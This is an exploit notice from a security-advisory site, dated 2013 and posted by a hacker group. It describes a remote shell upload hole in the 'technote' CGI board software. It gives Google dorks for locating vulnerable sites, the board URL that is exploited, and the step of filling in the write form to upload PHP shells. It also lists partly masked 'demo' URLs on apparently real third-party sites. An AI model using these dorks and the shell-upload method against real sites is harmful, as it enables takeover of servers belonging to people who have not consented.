technote cgi Remote Shell Upload Vulnerability

2013-08-30 / 2013-08-31
Credit: Iranian_Dark_Coders_Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/cgi-bin/technote/ OR inurl:\".cgi?board=FREE_BOARD\"

################# In The Name Of Allah ################ # # [+] Exploit Title: technote cgi Remote Shell Upload Vulnerability # [+] Google Dork 1 : inurl:/cgi-bin/technote/ # [+] Google Dork 2 : inurl:".cgi?board=FREE_BOARD" # [+] Google Dork 3 : intext:"TECHNOTE-TOP" # [+] Date: 30-08-2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Home : www.idc-team.net # [+] Discovered By : am22[Hacker Pir] # [+] Category: webapps # [+] Tested on: Windows 7 # [+] Vendor Homepage : http://www.technote.co.kr # ####################################################### # # [+] Exploit: # # [+] http://localhost/[path]/cgi-bin/technote/main.cgi?board=FREE_BOARD # ####################################################### # # [+] Proof: # # [+] Then fill in all the information requested and find shell etc... # [+] Operation : Upload PhP Shells or html etc... # ####################################################### # # [+] Demo : # [+] http://www.stiXXXaterkbc.org/cgi-bin/technote/aa.cgi?board=FREE_BOARD&command=write_form&answer=1078830343&nnew=1 # [+] http://www.pXXXo.co.kr/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=write_form # ####################################################### # # [+] Discovered By : am22[Hacker Pir] # [+] Spc Tnx : M.R.S.CO,N3O,Black.Hack3r,and all Members idc-team.net # #######################################################


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top